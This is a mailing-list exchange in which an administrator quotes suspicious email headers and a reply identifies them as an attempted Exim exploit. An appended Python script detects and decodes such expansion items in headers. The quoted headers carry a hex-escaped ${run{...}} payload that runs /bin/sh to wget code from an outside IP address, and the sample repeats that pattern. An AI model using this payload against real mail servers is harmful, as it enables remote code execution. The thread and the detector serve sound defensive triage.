It is an attempted exim exploit. Lmk if you need more info.

On Thu, Jul 11, 2019, 11:54 Dave Wreski <dwre...@guardiandigital.com> wrote:
> Hi all,
>
> Anyone have a guess on what this is trying to accomplish?
>
> From r...@sab.com Thu Jul 11 11:05:10 2019
> Return-Path: <r...@sab.com>
> X-Original-To:
> root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Delivered-To: usern...@example.com
> Received: by host.example.com (Postfix)
> id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
> Delivered-To:
> root+${
> run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Received: from sab.com (ns3.nodename.ru [89.104.77.8])
> by host.example.com (Postfix) with SMTP id 78E6F120294
> for
> <root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
>
> Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
>
> The IPs and host.example.com have been changed, but it's otherwise as
> received. Is it a failed attempt at trying to generate a random string,
> or to exploit some parser?
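
A header check for this pattern, as an added example that is not part of the original thread: it unfolds folded header lines, flags `${name{...}}` expansion items in recipient-bearing fields, and decodes the hex escapes so the argument can be read during triage. The field list, function names and sample message are constructed for illustration, and matching escapes without a leading backslash is an assumption made to cope with copies like the one quoted above.

```python
import re
from email import message_from_string

# Header fields that carry envelope or recipient addresses (assumed list).
ADDRESS_FIELDS = ("x-original-to", "delivered-to", "received", "to", "cc")
# An Exim-style expansion item such as ${run{...}} inside a header value.
EXPANSION = re.compile(r"\$\{\s*(\w+)\s*\{(.*?)\}\}", re.S)
# Hex escapes, written \x2F or (as in the quoted copy above) bare x2F.
HEX_ESCAPE = re.compile(r"\\?x([0-9A-Fa-f]{2})")

# Constructed sample modelled on the quoted headers; 192.0.2.10 is a documentation address.
SAMPLE = """\
Return-Path: <sender@example.net>
Delivered-To:
 root+${
 run{x2fbinx2fsht-ctx22wgetx20192.0.2.10x2fsamplex22}}@host.example.com
Subject: constructed sample

body
"""


def decode_escapes(arg):
    """Best-effort decode of hex escapes so an analyst can read the argument."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), arg)


def find_expansions(raw_message):
    """Return (field, item, decoded_argument) for each expansion item found."""
    msg = message_from_string(raw_message)
    hits = []
    for field, value in msg.items():
        if field.lower() not in ADDRESS_FIELDS:
            continue
        # Folded headers split the item across lines; unfold before matching.
        unfolded = re.sub(r"\r?\n[ \t]*", "", str(value))
        for m in EXPANSION.finditer(unfolded):
            hits.append((field, m.group(1).lower(), decode_escapes(m.group(2))))
    return hits


if __name__ == "__main__":
    for hit in find_expansions(SAMPLE):
        print(hit)
```

The bare `xHH` matching can misdecode ordinary text that happens to contain an `x` followed by two hex digits, so treat the decoded string as a reading aid and alert on the presence of the expansion item itself.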